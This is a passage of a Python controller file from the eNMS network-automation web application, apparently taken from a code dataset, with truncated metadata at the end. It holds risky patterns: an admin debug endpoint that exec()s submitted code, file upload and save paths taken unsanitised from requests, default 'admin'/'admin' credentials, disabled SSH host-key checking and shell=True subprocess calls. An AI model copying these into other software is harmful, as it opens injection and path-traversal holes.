run_kwargs[\"restart_run\"] = restart_run.id\n initial_payload = restart_run.payload\n run_kwargs[\"services\"] = [service.id]\n service.last_run = vs.get_time()\n run = db.factory(\n \"run\", service=service.id, commit=True, rbac=None, **run_kwargs\n )\n run.properties, run.payload = kwargs, {**initial_payload, **kwargs}\n return run.run()\n\n def run_debug_code(self, **kwargs):\n result = StringIO()\n with redirect_stdout(result):\n try:\n exec(\n kwargs[\"code\"],\n {\n \"controller\": self,\n \"env\": env,\n \"db\": db,\n \"models\": vs.models,\n \"vs\": vs,\n },\n )\n except Exception:\n return format_exc()\n return result.getvalue()\n\n def run_service(self, path, **kwargs):\n if \"application\" not in vs.server_data[\"allowed_automation\"]:\n return {\"error\": \"Runs from the UI are not allowed on this server.\"}\n if isinstance(kwargs.get(\"start_services\"), str):\n kwargs[\"start_services\"] = kwargs[\"start_services\"].split(\"-\")\n service_id = str(path).split(\">\")[-1]\n for property in (\"user\", \"csrf_token\"):\n kwargs.pop(property, None)\n if kwargs.get(\"form_type\", \"\").startswith(\"initial-\"):\n kwargs = {\"form\": kwargs, \"parameterized_run\": True}\n kwargs.update({\"creator\": getattr(current_user, \"name\", \"\"), \"path\": path})\n service = db.fetch(\"service\", id=service_id, rbac=\"run\")\n if service.disabled:\n return {\"error\": \"The workflow is disabled.\"}\n service.check_restriction_to_owners(\"run\")\n kwargs[\"runtime\"] = runtime = vs.get_time()\n run_name = kwargs.get(\"form\", {}).get(\"name\")\n if run_name and db.fetch(\"run\", name=run_name, allow_none=True, rbac=None):\n return {\"error\": \"There is already a run with the same name.\"}\n if kwargs.get(\"asynchronous\", True):\n if vs.settings[\"automation\"][\"use_task_queue\"]:\n self.run.send(service_id, **kwargs)\n else:\n Thread(target=self.run, args=(service_id,), kwargs=kwargs).start()\n else:\n service.run(runtime=runtime)\n return {\n \"service\": service.serialized,\n \"runtime\": runtime,\n \"restart\": \"restart_runtime\" in kwargs,\n \"user\": current_user.name,\n }\n\n def run_service_on_targets(self, **kwargs):\n return self.run_service(\n kwargs[\"service\"],\n **{f\"target_{kwargs['type']}s\": kwargs[\"targets\"].split(\"-\")},\n )\n\n def save_file(self, filepath, **kwargs):\n scoped_path, content = filepath.replace(\">\", \"/\"), None\n if kwargs.get(\"file_content\"):\n with open(f\"{vs.file_path}{scoped_path}\", \"w\") as file:\n content = file.write(kwargs[\"file_content\"])\n db.fetch(\"file\", path=scoped_path).update()\n return content\n\n def save_positions(self, type, id, **kwargs):\n now = vs.get_time()\n instance = db.fetch(type, allow_none=True, id=id, rbac=\"edit\")\n if not instance:\n return\n relation_type = \"node\" if type == \"network\" else \"service\"\n for id, position in kwargs.items():\n new_position = [position[\"x\"], position[\"y\"]]\n if \"-\" not in id:\n relation = db.fetch(relation_type, id=id, rbac=None)\n relation.positions[instance.name] = new_position\n elif id in instance.labels:\n instance.labels[id] = {**instance.labels[id], \"positions\": new_position}\n return now\n\n def save_profile(self, **kwargs):\n allow_password_change = vs.settings[\"authentication\"][\"allow_password_change\"]\n if not allow_password_change or current_user.authentication != \"database\":\n kwargs.pop(\"password\", None)\n current_user.update(**kwargs)\n\n def save_settings(self, **kwargs):\n vs.settings = vs.template_context[\"settings\"] = kwargs[\"settings\"]\n if kwargs[\"save\"]:\n with open(vs.path / \"setup\" / \"settings.json\", \"w\") as file:\n dump(kwargs[\"settings\"], file, indent=2)\n\n def scan_cluster(self, **kwargs):\n protocol = vs.settings[\"cluster\"][\"scan_protocol\"]\n for ip_address in IPv4Network(vs.settings[\"cluster\"][\"scan_subnet\"]):\n try:\n server = http_get(\n f\"{protocol}://{ip_address}/rest/is_alive\",\n timeout=vs.settings[\"cluster\"][\"scan_timeout\"],\n ).json()\n if vs.settings[\"cluster\"][\"id\"] != server.pop(\"cluster_id\"):\n continue\n db.factory(\"server\", **{**server, **{\"ip_address\": str(ip_address)}})\n except ConnectionError:\n continue\n\n def scan_playbook_folder(self):\n playbooks = [\n [\n str(file).replace(str(vs.playbook_path), \"\")\n for file in Path(vs.playbook_path).glob(extension)\n ]\n for extension in (\"*.yaml\", \"*.yml\")\n ]\n return sorted(sum(playbooks, []))\n\n def scheduler_action(self, mode, **kwargs):\n for task in self.filtering(\"task\", properties=[\"id\"], form=kwargs):\n self.task_action(mode, task.id)\n\n def search_builder(self, type, id, text):\n property = \"nodes\" if type == \"network\" else \"services\"\n return [\n node.id\n for node in getattr(db.fetch(type, id=id), property)\n if text.lower() in str(node.get_properties().values()).lower()\n ]\n\n def search_workflow_services(self, **kwargs):\n service_alias = aliased(vs.models[\"service\"])\n workflows = [\n workflow.name\n for workflow in db.query(\"workflow\", properties=[\"name\"])\n .join(service_alias, vs.models[\"workflow\"].services)\n .filter(service_alias.scoped_name.contains(kwargs[\"str\"].lower()))\n .distinct()\n .all()\n ]\n return [\"standalone\", \"shared\", *workflows]\n\n def skip_services(self, workflow_id, service_ids):\n services = [db.fetch(\"service\", id=id) for id in service_ids.split(\"-\")]\n workflow = db.fetch(\"workflow\", id=workflow_id, rbac=\"edit\")\n workflow.check_restriction_to_owners(\"edit\")\n skip = not all(service.skip.get(workflow.name) for service in services)\n for service in services:\n service.skip[workflow.name] = skip\n workflow.update_last_modified_properties()\n return {\n \"skip\": \"skip\" if skip else \"unskip\",\n \"update_time\": workflow.last_modified,\n }\n\n def stop_run(self, runtime):\n run = db.fetch(\"run\", allow_none=True, runtime=runtime)\n if run and run.status == \"Running\":\n if env.redis_queue:\n env.redis(\"set\", f\"stop/{runtime}\", \"true\")\n else:\n vs.run_stop[runtime] = True\n return True\n\n def switch_menu(self, user_id):\n user = db.fetch(\"user\", rbac=None, id=user_id)\n user.small_menu = not user.small_menu\n\n def switch_theme(self, user_id, theme):\n db.fetch(\"user\", rbac=None, id=user_id).theme = theme\n\n def task_action(self, mode, task_id):\n return db.fetch(\"task\", id=task_id, rbac=\"edit\").schedule(mode)\n\n def topology_export(self, **kwargs):\n workbook = Workbook()\n filename = kwargs[\"export_filename\"]\n if \".\" not in filename:\n filename += \".xls\"\n for obj_type in (\"device\", \"link\"):\n sheet = workbook.add_sheet(obj_type)\n for index, property in enumerate(vs.model_properties[obj_type]):\n if property in db.dont_migrate[obj_type]:\n continue\n sheet.write(0, index, property)\n for obj_index, obj in enumerate(db.fetch_all(obj_type), 1):\n value = getattr(obj, property)\n if type(value) == bytes:\n value = str(env.decrypt(value), \"utf-8\")\n sheet.write(obj_index, index, str(value))\n workbook.save(vs.file_path / \"spreadsheets\" / filename)\n\n def topology_import(self, file):\n book = open_workbook(file_contents=file.read())\n status = \"Topology successfully imported.\"\n for obj_type in (\"device\", \"link\"):\n try:\n sheet = book.sheet_by_name(obj_type)\n except XLRDError:\n continue\n properties = sheet.row_values(0)\n for row_index in range(1, sheet.nrows):\n values = {}\n for index, property in enumerate(properties):\n if not property:\n continue\n property_type = vs.model_properties[obj_type].get(property, \"str\")\n func = db.field_conversion[property_type]\n values[property] = func(sheet.row_values(row_index)[index])\n try:\n db.factory(obj_type, **values).serialized\n except Exception as exc:\n info(f\"{str(values)} could not be imported ({str(exc)})\")\n status = \"Partial import (see logs).\"\n db.session.commit()\n for pool in db.fetch_all(\"pool\", rbac=\"edit\"):\n pool.compute_pool()\n env.log(\"info\", status)\n return status\n\n def update(self, type, **kwargs):\n try:\n kwargs[\"must_be_new\"] = kwargs.get(\"id\") == \"\"\n for arg in (\"name\", \"scoped_name\"):\n if arg in kwargs:\n kwargs[arg] = kwargs[arg].strip()\n if kwargs[\"must_be_new\"]:\n kwargs[\"creator\"] = kwargs[\"user\"] = getattr(current_user, \"name\", \"\")\n for builder_type in (\"workflow\", \"network\"):\n if not kwargs.get(f\"{builder_type}s\"):\n continue\n builder_id = kwargs[f\"{builder_type}s\"][0]\n db.fetch(builder_type, id=builder_id, rbac=\"edit\")\n instance = db.factory(type, **kwargs)\n if kwargs.get(\"copy\"):\n db.fetch(type, id=kwargs[\"copy\"]).duplicate(clone=instance)\n db.session.flush()\n return instance.post_update()\n except db.rbac_error:\n return {\"alert\": \"Error 403 - Not Authorized.\"}\n except Exception as exc:\n db.session.rollback()\n if isinstance(exc, IntegrityError):\n alert = (\n f\"There is already a {instance.class_type} \"\n \"with the same parameters.\"\n )\n return {\"alert\": alert}\n env.log(\"error\", format_exc())\n return {\"alert\": str(exc)}\n\n def update_all_pools(self):\n for pool in db.fetch_all(\"pool\", rbac=\"edit\"):\n pool.compute_pool()\n\n def update_database_configurations_from_git(self, force_update=False):\n path = vs.path / \"network_data\"\n env.log(\"info\", f\"Updating device configurations with data from {path}\")\n for dir in scandir(path):\n device = db.fetch(\"device\", allow_none=True, name=dir.name)\n timestamp_path = Path(dir.path) / \"timestamps.json\"\n if not device:\n continue\n try:\n with open(timestamp_path) as file:\n timestamps = load(file)\n except Exception:\n timestamps = {}\n for property in vs.configuration_properties:\n no_update = False\n for timestamp, value in timestamps.get(property, {}).items():\n if timestamp == \"update\":\n db_date = getattr(device, f\"last_{property}_update\")\n if db_date != \"Never\" and not force_update:\n no_update = vs.str_to_date(value) <= vs.str_to_date(db_date)\n setattr(device, f\"last_{property}_{timestamp}\", value)\n filepath = Path(dir.path) / property\n if not filepath.exists() or no_update:\n continue\n with open(filepath) as file:\n setattr(device, property, file.read())\n db.session.commit()\n for pool in db.fetch_all(\"pool\"):\n if any(\n getattr(pool, f\"device_{property}\")\n for property in vs.configuration_properties\n ):\n pool.compute_pool()\n db.session.commit()\n\n def update_device_rbac(self):\n for group in db.fetch_all(\"group\"):\n for property in vs.rbac[\"rbac_models\"][\"device\"]:\n pool_property = getattr(vs.models[\"pool\"], f\"rbac_group_{property}\")\n devices = (\n db.query(\"device\")\n .join(vs.models[\"device\"].pools)\n .join(vs.models[\"group\"], pool_property)\n .filter(vs.models[\"group\"].id == group.id)\n .all()\n )\n setattr(group, f\"{property}_devices\", devices)\n\n def upload_files(self, **kwargs):\n path = f\"{vs.file_path}/{kwargs['folder']}/{kwargs['file'].filename}\"\n kwargs[\"file\"].save(path)\n\n def update_pool(self, pool_id):\n db.fetch(\"pool\", id=int(pool_id), rbac=\"edit\").compute_pool()\n\n def view_filtering(self, **kwargs):\n return {\n f\"{model}s\": self.filtering(model, **form, bulk=\"view_properties\")\n for model, form in kwargs.items()\n }\n\n def web_connection(self, device_id, **kwargs):\n if not vs.settings[\"ssh\"][\"credentials\"][kwargs[\"credentials\"]]:\n return {\"alert\": \"Unauthorized authentication method.\"}\n device = db.fetch(\"device\", id=device_id, rbac=\"connect\")\n port, endpoint = env.get_ssh_port(), str(uuid4())\n command = f\"{vs.settings['ssh']['command']} -p {port}\"\n if vs.settings[\"ssh\"][\"bypass_key_prompt\"]:\n options = \"-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\"\n else:\n options = \"\"\n environment = {\n **{key: str(value) for key, value in vs.settings[\"ssh\"][\"web\"].items()},\n \"APP_ADDRESS\": getenv(\"SERVER_URL\", \"https://0.0.0.0\"),\n \"DEVICE\": str(device.id),\n \"ENDPOINT\": endpoint,\n \"ENMS_USER\": getenv(\"ENMS_USER\", \"admin\"),\n \"ENMS_PASSWORD\": getenv(\"ENMS_PASSWORD\", \"admin\"),\n \"FLASK_APP\": \"app.py\",\n \"IP_ADDRESS\": getattr(device, kwargs[\"address\"]),\n \"OPTIONS\": options,\n \"PORT\": str(device.port),\n \"PROTOCOL\": kwargs[\"protocol\"],\n \"REDIRECTION\": str(vs.settings[\"ssh\"][\"port_redirection\"]),\n \"USER\": current_user.name,\n }\n if \"authentication\" in kwargs:\n credentials = self.get_credentials(device, optional=True, **kwargs)\n if not credentials:\n return {\"alert\": f\"No credentials found for '{device.name}'.\"}\n environment.update(zip((\"USERNAME\", \"PASSWORD\"), credentials))\n Popen(command, shell=True, cwd=vs.path / \"terminal\", env=environment)\n return {\n \"device\": device.name,\n \"port\": port,\n \"endpoint\": endpoint,\n \"redirection\": vs.settings[\"ssh\"][\"port_redirection\"],\n }\n\n\ncontroller = Controller()\n", "repo_name": "eNMS-automation/eNMS", "sub_path": "eNMS/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 66938, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 780, "dataset": "github-code", "pt": "52", "api": [{"api_name": "eNMS.variables.vs.settings", "line_number": 45, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 45, "usage_type": "name"}, {"api_name": "eNMS.database.db.import_export_models", "line_number": 46, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 46, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 54, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 61, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 61, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 66, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 66, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 74, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 74, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 74, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 78, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 78, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 82, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 82, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 85, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 85, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 92, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 92, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 93, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 97, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 97, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 99, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 99, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 100, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 100, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 101, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 101, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete", "line_number": 130, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 130, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 136, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 136, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 145, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 145, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 146, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 146, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 165, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 165, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 175, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 175, "usage_type": "name"}, {"api_name": "re.search", "line_number": 179, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 185, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 196, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 196, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.delete", "line_number": 199, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 199, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 199, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.dict_to_string", "line_number": 203, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 203, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 203, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 203, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.dict_to_string", "line_number": 204, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 204, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 204, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 204, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 206, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 206, "usage_type": "name"}, {"api_name": "difflib.unified_diff", "line_number": 212, "usage_type": "call"}, {"api_name": "eNMS.database.db.objectify", "line_number": 224, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 224, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 225, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 225, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 243, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 243, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 243, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 251, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 251, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 256, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 256, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 257, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 257, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 259, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 259, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 263, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 263, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 267, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 267, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 268, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 268, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 273, "usage_type": "call"}, {"api_name": "eNMS.database.db.query", "line_number": 273, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 273, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 276, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 276, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 277, "usage_type": "call"}, {"api_name": "eNMS.database.db.delete_all", "line_number": 288, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 288, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete", "line_number": 292, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 292, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 297, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 297, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete", "line_number": 302, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 302, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 304, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 304, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 309, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 309, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 311, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 311, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete_instance", "line_number": 313, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 313, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 321, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 321, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 324, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 324, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 332, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 332, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 333, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 333, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 333, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 344, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 344, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 348, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 348, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.server_version", "line_number": 351, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 351, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 352, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 352, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 355, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 355, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 356, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 358, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 368, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 368, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 370, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 370, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 384, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 384, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 391, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 391, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 393, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 393, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 394, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 394, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 394, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 410, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 410, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 410, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 416, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 416, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 416, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 425, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 425, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 426, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 426, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 433, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 450, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 471, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 471, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 473, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 473, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 476, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 476, "usage_type": "name"}, {"api_name": "eNMS.database.db.get_credential", "line_number": 480, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 480, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 481, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 481, "usage_type": "name"}, {"api_name": "eNMS.environment.env.get_password", "line_number": 485, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 485, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 492, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 492, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 493, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 493, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 498, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 498, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.custom.parse_configuration_property", "line_number": 500, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.custom", "line_number": 500, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 500, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 501, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 501, "usage_type": "name"}, {"api_name": "eNMS.forms.form_factory.register_parameterized_form", "line_number": 505, "usage_type": "call"}, {"api_name": "eNMS.forms.form_factory", "line_number": 505, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.form_properties", "line_number": 506, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 506, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 509, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 509, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 510, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 510, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.path", "line_number": 513, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 513, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 515, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 516, "usage_type": "call"}, {"api_name": "git.Repo.clone_from", "line_number": 519, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 519, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 521, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 521, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 525, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 525, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 526, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 526, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 529, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 529, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 530, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 530, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.path", "line_number": 531, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 531, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 537, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 537, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 541, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 541, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 541, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 542, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 542, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 543, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 543, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 546, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.custom.parse_configuration_property", "line_number": 548, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.custom", "line_number": 548, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 548, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 556, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 556, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.migration_path", "line_number": 556, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 556, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 559, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 559, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 563, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 563, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.reports", "line_number": 574, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 574, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 577, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 577, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 580, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 580, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 580, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 582, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 582, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 583, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 583, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 587, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 587, "usage_type": "name"}, {"api_name": 